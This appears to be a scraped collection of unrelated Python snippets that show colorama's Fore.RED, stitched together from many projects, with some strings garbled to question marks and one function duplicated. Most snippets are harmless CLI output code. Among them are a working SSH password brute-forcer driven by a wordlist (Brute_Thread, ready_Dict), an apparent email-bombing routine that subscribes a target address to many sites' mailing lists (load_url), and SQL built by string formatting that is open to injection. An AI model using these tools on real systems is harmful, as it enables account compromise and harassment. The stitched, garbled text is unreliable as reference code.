def print_validate_fail_detail(compare_object,key=''):
"""
print invalid reason.
@params:
compare_object - Required : validation result object (result of compliace_report())
key - Optional : dict key of compliance_result
"""
if isinstance(compare_object,dict):
for key,dst in compare_object.items():
if isinstance(dst,dict):
# recursive
reason,result = print_validate_fail_detail(dst,key)
if not reason == None:
print(' '*9 , end='')
print(Fore.RED + 'INVALID! [type:{0}] {1} : {2}'.format(key,reason,result))
elif isinstance(dst,list):
for d in dst:
return key,d
elif isinstance(dst,int):
if not (isinstance(dst,bool)) or (key == 'actual_value'):
return key,dst
return None,None
python类RED的实例源码
def rollback_operation(device,config):
try:
device.discard_config()
replace_result = device.replace(config)
commit_result = device.commit()
rollback = replace_result & commit_result
print_bool_result(rollback,'Fore')
print('Rollbacked config!')
except Exception as err:
print(Back.RED + 'Rollback Error!!')
print(Back.RED + str(err))
finally:
device.close()
sys.exit()
def read_chat_history():
choice = select_a_friend()
if choice is not None:
print (Fore.BLUE + "Messages sent are shown in blue color \n" + Fore.GREEN + " Received Messages and Read Messages are shown in green color:"+Fore.RESET)
chats = friends[choice].chats
for chat in chats:
if chat.sent_by_me:
print (Fore.RED + str(chat['time']) + " " + Fore.BLUE + friends[choice]['name'] + " " + Fore.RESET + chat['message'])
else:
print (Fore.RED + str(chat['time']) + " " + Fore.GREEN + friends[choice]['name'] + " " + Fore.RESET + chat['message'])
else:
print "Wrong choice"
def ex_print (type, msg, ret):
colorama.init()
# Define color and style constants
c_error = Fore.RED
c_action = Fore.YELLOW
c_ok = Fore.GREEN
c_white = Fore.WHITE
s_br = Style.BRIGHT
s_reset = Style.RESET_ALL
message = {
"error": c_error + s_br,
"action": c_action,
"positive": c_ok + s_br,
"info": c_white + s_br,
"reset": s_reset
}
style = message.get(type, s_reset)
if ret == 0:
print(style + msg, end = "")
else:
print(style + msg)
def display_warning_to_user(self):
""" display warning to user
show user the commands + switches and ask if they
would still like to proceed or not """
user_message = Fore.CYAN + "\nYou are about to run the following commands:"
print(user_message)
for command in self.commands:
print(command)
user_message = Fore.CYAN + "\nOn the following devices:"
print(user_message)
for device in sorted(self.devices.keys()):
print(device)
user_message = Fore.RED + "\nAre you sure you wish to proceed? (y/n) " + Fore.WHITE
user_input = input(user_message)
if user_input.lower() == 'y':
return True
else:
return False
def tenant_report(tenant_config):
from drift.tenant import get_connection_string
conn_string = get_connection_string(tenant_config)
print "Tenant configuration for '{}' on tier '{}':" \
.format(tenant_config["name"], get_tier_name())
for k in sorted(tenant_config.keys()):
print " {} = {}".format(k, tenant_config[k])
print "Connection string:\n {}".format(conn_string)
print "Database check... "
db_error = db_check(tenant_config)
if db_error:
if "does not exist" in db_error:
print Fore.RED + " FAIL! DB does not exist"
print " You can create this database by running this " \
"command again with the action 'create'"
else:
print Fore.RED + " {}".format(db_error)
else:
print Fore.GREEN + " OK! Database is online and reachable"
def tenants_report():
print "The following tenants are registered in config on tier '{}':".format(get_tier_name())
config = load_config()
for tenant_config in config.get("tenants", []):
name = tenant_config["name"]
# TODO: Get rid of this
if name == "*":
continue
sys.stdout.write(" {}... ".format(name))
db_error = db_check(tenant_config)
if not db_error:
print Fore.GREEN + "OK"
else:
if "does not exist" in db_error:
print Fore.RED + "FAIL! DB does not exist"
else:
print Fore.RED + "Error: %s" % db_error
print "To view more information about each tenant run this command again with the tenant name"
def process_search(options):
search_query = []
search_query.extend([hex_pattern(val.replace(' ', '')) for val in options.hex])
search_query.extend([ascii_pattern(val) for lst in options.a for val in lst])
search_query.extend([wide_pattern(val) for lst in options.w for val in lst])
result = BINOBJ.search(
search_query, limit=options.limit, exact=options.exact, test=options.test)
if 'error' in result:
print(Style.BRIGHT + Fore.RED + result['error']['message'])
return
if 'stats' in result:
show_stats_new(result['stats'], options.limit)
if len(result['results']) == 0:
return
# if len(result['results']) >= options.limit:
# print("Showing top {0} results:".format(options.limit))
# else:
# print("Results:")
show_results(result['results'], pretty_print=options.pretty_print)
def main(options):
if options.pretty_print and not HAS_TABULATE:
print(Style.BRIGHT + Fore.RED + "Pretty printing requires tabulate python module. (pip install tabulate)")
return
init_api(options)
cmd = options.commands
switcher = {
'search': process_search,
'hunt': process_hunt,
'sign': process_sign,
'classify': process_classify,
'metadata': process_metadata,
'demo': process_demo
}
# Get the function from switcher dictionary
process_fn = switcher.get(cmd)
# Execute the function
return process_fn(options)
def instant_giveaway(prize_name):
global won_giveaways, lost_giveaways
giveaway_box = chromedriver.find_element_by_id(instant_box)
giveaway_box.click()
time.sleep(10)
get_result = chromedriver.find_element_by_id('title')
time.sleep(5)
if "you didn't win" in get_result.text:
lost_giveaways += 1
print(Fore.YELLOW + Style.BRIGHT + '\n **** You did not win: %s' % prize_name)
time.sleep(5)
elif "you're a winner!" in get_result.text:
won_giveaways += 1
print(Fore.GREEN + Style.BRIGHT + '\n **** Winner Winner! Chicken Dinner!: %s' % prize_name)
time.sleep(1)
playsound('.\sounds\\btyswt.mp3')
time.sleep(5)
else:
print(Fore.RED + Style.BRIGHT + '\n ---- UNRECOGNIZED RESPONSE FOR: %s' % prize_name)
# function to process the 'None' requirement giveaways.
def load_url(url, timeout):
# Build URL query to email signup page
urlquery = "http://" + url + "/m-users-a-email_list-job-add-email-" + targetEmail + "-source-2.htm"
print_out(Style.BRIGHT + Fore.WHITE + "Sending request to: " + url)
# Build the request
req = urllib.request.Request(
urlquery,
data=None,
headers={
'User-Agent': random.choice(useragents),
'Host': url
}
)
# Send
try:
f = urllib.request.urlopen(req)
print_out(Style.BRIGHT + Fore.GREEN + "Successfully sent!")
f.close()
except urllib.error.URLError as e:
print_out(Style.BRIGHT + Fore.RED + e.reason)
def _update_ui():
global timeout_count, result_codes, connection_error_count
print '\r',
for k, v in result_codes.iteritems():
print "%s:" % k,
if k == '200 OK':
print(Fore.LIGHTGREEN_EX),
else:
print(Fore.RED),
print "%s " % v,
print(Style.RESET_ALL),
if timeout_count > 0:
print('Timeouts: '+Fore.YELLOW + str(timeout_count) + Style.RESET_ALL) + ' ',
if connection_error_count >0:
print('Connection Errors: '+Fore.RED + str(connection_error_count) + Style.RESET_ALL),
sys.stdout.flush()
def __init__(self, ethers_path, static_ethers, wipe):
"""
:param ethers_path: path to the ethers file
:param static_ethers: path to static ethers file (only when wiping)
:param wipe: wipe the ethers
"""
self.ethers_path = ethers_path
self.wipe = wipe
self.ethers = {}
EthersManager.assert_writable(self.ethers_path)
if wipe:
print(Fore.RED + Style.BRIGHT + "The ethers file will be wiped!")
if static_ethers:
print(Fore.BLUE + "The static ethers will be loaded")
self.load_ethers(static_ethers)
else:
print(Fore.BLUE + "The ethers file will be created from scratch")
else:
self.load_ethers(self.ethers_path)
def add_contestant(self, mac, row, col, response):
try:
if not 1 <= int(row) <= 255: raise
if not 1 <= int(col) <= 255: raise
except:
response.status_code = 400
response.data = "Invalid row/col: row=%s col=%s" % (row, col)
return
ip = self.contestant_ip_format.replace('R', row).replace('C', col)
print(Fore.CYAN + "Contestant PC connected: MAC=%s IP=%s" % (mac, ip))
result = self.ethers_manager.add_ether(mac, ip)
if result:
print(Fore.RED + result)
response.data = result
response.status_code = 400
else:
response.data = ip
def add_worker(self, mac, num, response):
try:
if not 1 <= int(num) <= 255: raise
except:
response.status_code = 400
response.data = "Invalid num: num=%s" % (num)
return
ip = self.worker_ip_format.replace('N', num)
print(Fore.BLUE + "Worker PC connected: MAC=%s IP=%s" % (mac, ip))
result = self.ethers_manager.add_ether(mac, ip)
if result:
print(Fore.RED + result)
response.data = result
response.status_code = 400
else:
response.data = ip
def tick(game, template, is_json, no_color):
if not game:
raise click.BadParameter('Missing required parameter "game"')
matches = download_history(game)
if is_json:
click.echo(json.dumps(list(matches), indent=2, sort_keys=True))
return
template = template if template else DEFAULT_TEMPLATE_RECAP
template = Template(template)
for m in matches:
if no_color or not COLOR_ENABLED: # if color is disabled just stdout
print_match(m, template)
continue
if m['t1_score'] > m['t2_score']:
m['t1'] = Fore.GREEN + m['t1'] + Fore.RESET
m['t2'] = Fore.RED + m['t2'] + Fore.RESET
else:
m['t2'] = Fore.GREEN + m['t2'] + Fore.RESET
m['t1'] = Fore.RED + m['t1'] + Fore.RESET
print_match(m, template)
def createEntry(name, pdf_path, comment, bibtex):
bib = ''.join(bibtex)
#Todo Catch exceptions
try:
db = bibtexparser.loads(bib)
if db.entries:
parsedBib = db.entries[0]
else:
print(_F.RED, 'No citation for ', name, _F.RESET, sep='')
parsedBib = None
except Exception as e:
print('EX :', e.__class__.__name__)
print(e)
parsedBib = None
comment, tag_list, priority = parseComment(comment)
return Entry(name, parsedBib, tag_list, priority, None, url=pdf_path, comment=comment)
def authorize_concept(self, concept):
if '2' not in concept.sf:
raise ValueError('No vocabulary code (2) given!')
if concept.sf['2'] in self.vocabularies:
vocab = self.vocabularies[concept.sf['2']]
else:
log.info(Fore.RED + '?' + Style.RESET_ALL + ' Could not authorize: %s', concept)
return
response = vocab.authorize_term(concept.term, concept.tag)
if response.get('id') is not None:
identifier = response.get('id')
if concept.sf.get('0'):
if concept.sf.get('0') == ANY_VALUE:
pass # ignore ANY_VALUE
elif identifier != concept.sf['0']:
identifier = pick_one('The $$0 value does not match the authority record id. ' +
'Please select which to use',
[concept.sf['0'], identifier])
concept.sf['0'] = identifier
log.info(Fore.GREEN + '?' + Style.RESET_ALL + ' Authorized: %s', concept)
else:
log.info(Fore.RED + '?' + Style.RESET_ALL + ' Could not authorize: %s', concept)
def facebook_login(driver, username, password):
print("\n\n\nLogin to Facebook...."),
sys.stdout.flush()
url = "http://www.facebook.com"
driver.get(url)
elem = driver.find_element_by_id("email")
elem.send_keys(username)
elem = driver.find_element_by_id("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
time.sleep(1)
html_source = driver.page_source
if "Please re-enter your password" in html_source or "Incorrect Email" in html_source:
print(Fore.RED + "Incorrect Username or Password")
driver.close()
exit()
else:
print(Fore.GREEN + "Success\n")
return driver.get_cookies()
def defrag(self):
download_queue = self.handle.get_download_queue()
downloading = [piece['piece_index'] for piece in download_queue]
numerales = ""
pieces = self.status.pieces
for i, piece in enumerate(pieces):
numeral = Fore.GREEN + "#" if piece else Fore.RED + "#"
if i in downloading:
numeral = Fore.YELLOW + "v"
elif self._served_blocks is not None and self._served_blocks[i]:
numeral = Fore.BLUE + ">"
numeral += str(self.handle.piece_priority(i))
numerales += numeral
if numerales != "":
numerales = term.magenta("\nPieces download state:\n" + numerales)
return "%s\n" % numerales
def login(username, password):
echo('Downloading login page')
login_html = dA.get(url['login']).text
params = {
'validate_token' : get_validate_token(login_html),
'validate_key' : get_validate_key(login_html),
'username' : username,
'password' : password,
'ref' : url['login_ref']
}
echo('Logging in as %s' % username)
post = dA.post(url['login'], data=params)
post_html = post.text
if '"loggedIn":true' in post_html:
echo('Logged in as ' + username)
return True
else:
log('login_error.htm', post_html)
echo(Back.RED + post.url)
def insert_data(self, table, my_dict):
try:
cols = ','.join(my_dict.keys())
values = '","'.join(my_dict.values())
values = '"' + values + '"'
try:
# print "table:%s,cols:%s,values:%s." %(table, cols, values)
sql = "insert into %s (%s) values(%s)" % (table, cols, values)
# print "sql:",sql
result = self.cur.execute(sql)
self.db.commit()
if result:
return 1
else:
return 0
except MySQLdb.Error as e:
self.db.rollback()
if "key 'PRIMARY'" in e.args[1]:
print Fore.RED + self.get_current_time(), "???????????"
else:
print Fore.RED + self.get_current_time(), "????????? %d: %s" % (e.args[0], e.args[1])
except MySQLdb.Error as e:
print Fore.RED + self.get_current_time(), "????????%d: %s" % (e.args[0], e.args[1])
def insert_data(self, table, my_dict):
try:
cols = ','.join(my_dict.keys())
values = '","'.join(my_dict.values())
values = '"' + values + '"'
try:
# print "table:%s,cols:%s,values:%s." %(table, cols, values)
sql = "insert into %s (%s) values(%s)" % (table, cols, values)
# print "sql:",sql
result = self.cur.execute(sql)
self.db.commit()
if result:
return 1
else:
return 0
except MySQLdb.Error as e:
self.db.rollback()
if "key 'PRIMARY'" in e.args[1]:
print Fore.RED + self.get_current_time(), "???????????"
else:
print Fore.RED + self.get_current_time(), "????????? %d: %s" % (e.args[0], e.args[1])
except MySQLdb.Error as e:
print Fore.RED + self.get_current_time(), "????????%d: %s" % (e.args[0], e.args[1])
def TOR_PROC_CHECK():
isTorRunnin = False
TOR_INFO = {}
TOR_PROC = None
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
except psutil.NoSuchProcess:
pass
else:
if pinfo['name'] == "tor":
isTorRunnin = True
TOR_INFO['pid'] = pinfo['pid']
TOR_INFO['name'] = pinfo['name']
break
if isTorRunnin == True:
print ("[" + Fore.GREEN + Style.BRIGHT + "+" + Style.RESET_ALL + "]" + Fore.GREEN + Style.BRIGHT + " Tor is running." + Style.RESET_ALL)
TOR_PROC = psutil.Process(int(TOR_INFO['pid']))
return TOR_PROC
else:
print ("[" + Fore.RED + Style.BRIGHT + "-" + Style.RESET_ALL + "]" + Fore.RED + Style.BRIGHT + " Tor is not running." + Style.RESET_ALL)
exit()
def trains(self):
for raw_train in self.available_trains:
raw_train = raw_train['queryLeftNewDTO']
train_no = raw_train['station_train_code']
initial = train_no[0].lower()
if not self.options or initial in self.options:
train = [
train_no,
'\n'.join([Fore.GREEN + raw_train['from_station_name'] + Fore.RESET,
Fore.RED + raw_train['to_station_name'] + Fore.RESET]),
'\n'.join([Fore.GREEN + raw_train['start_time'] + Fore.RESET,
Fore.RED + raw_train['arrive_time'] + Fore.RESET]),
self._get_duration(raw_train),
raw_train['zy_num'],
raw_train['ze_num'],
raw_train['rw_num'],
raw_train['yw_num'],
raw_train['yz_num'],
raw_train['wz_num'],
]
yield train
def __data_parser__(self, data):
try:
if data['mods']['itemlist']['data']['auctions']:
search_results = data['mods']['itemlist']['data']['auctions']
return [{
'intro': result["raw_title"],
'price': float(result["view_price"]),
'delivery': colorful_text(result["view_fee"], Fore.RED)
if float(result["view_fee"]) > 0 else result["view_fee"],
'sales': int(result["view_sales"].split('?')[0]),
'belong': colorful_text("??", Fore.CYAN)
if result.get('shopcard', {}).get('isTmall', False) else "??",
'url': result["detail_url"]
} for result in search_results]
error('Ops, get no goods..')
return []
except KeyError:
error('Ops, some key error happened..')
return []
def Brute_Thread(ip,username,passwd):
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
global n,flag,flag1
n=n+1
try:
ssh.connect(ip,username=username,password=passwd)
except paramiko.AuthenticationException:
print Fore.RED+"[-]Username: %s\tPassword: %s failed."%(username,passwd) + Fore.RESET
else:
print Fore.GREEN+"\n********************************************************"
print "[#]Username: %s\tPassword: %s Found........!!!"%(username,passwd)
print "********************************************************"+Fore.RESET
flag=1
flag1=1
print Fore.RED+"\nFound correct password after %s attempts..." %n +Fore.RESET
return
ssh.close()
return
def ready_Dict(ip,username,filename):
global flag,n
f=open(filename,"r")
st=f.read()
wordlist=st.split('\n')
for i in wordlist:
if flag==0:
t=threading.Thread(Brute_Thread(ip,username,i))
t.start()
elif flag==1:
flag=0
break
if flag==1:
print Fore.RED+"\nFinished wordlist...%s words checked...password not found!!!" % n+Fore.RESET
n=0
f.close()
def getConfig():
try:
with open('%s/visionarypm.conf' % path) as f:
config = json.loads(f.read().strip())
if config['oLen'] < 16 or config['oLen'] > 64 or config['cost'] < 10 or config['cost'] > 20 or config['nwords'] > 16 or config['nwords'] < 4:
exit('Invalid config! Please delete the configuration file (%s) and a new one will be generated on the next run.' % (path + '/visionarypm.conf'))
return config, 1
except IOError:
config = get_defaults()
autosave = safe_input('Do you want to save this config? (Y/n) ').lower()
if autosave == 'yes' or autosave == 'y' or autosave == '':
print('\nAutosaving configuration...')
try:
with open('%s/visionarypm.conf' % path, 'a') as f:
f.write(json.dumps(config))
return config, 1
except:
print(color('Autosaving failed! [Permission denied]\n', Fore.RED))
print('In order to save these settings, place %s' % color(json.dumps(config), Fore.YELLOW))
print('in %s' % (color('%s/visionarypm.conf' % path, Fore.YELLOW)))
return config, 0
except (KeyError, json.decoder.JSONDecodeError):
exit('Invalid config! Please delete the configuration file (%s) and a new one will be generated on the next run.' % (path + '/visionarypm.conf'))
def app_header(self):
header = '\n'
header += ' ??????????? ???? ?????? ???? ??? ?????? ??????? ??????????????? \n'
header += ' ????????????? ?????????????????? ??????????????????? ????????????????\n'
header += ' ??? ????????????????????????? ?????????????? ?????????? ????????\n'
header += ' ??? ???????????????????????????????????????? ????????? ????????\n'
header += ' ??????????? ??? ?????? ?????? ????????? ??????????????????????? ???\n'
header += ' ?????????? ?????? ?????? ???????? ??? ??????? ??????????? ???\n'
header2 = ' Connection Manager\n'
header3 = ' {}\n'.format('-' * 70)
header3 += ' Version : {}\n'.format(__version__)
header3 += ' Release date : {}\n'.format(__release_date__)
header3 += ' Github : https://github.com/fachrioktavian/CManager\n'
header3 += ' Dev by : {0} - ({1})\n'.format(__author__, __author_email__)
header3 += ' Official : https://dracos-linux.org\n'
header3 += ' {}\n'.format('-' * 70)
print (Fore.RED + Style.DIM + header + header2)
print (Fore.CYAN + Style.DIM + header3)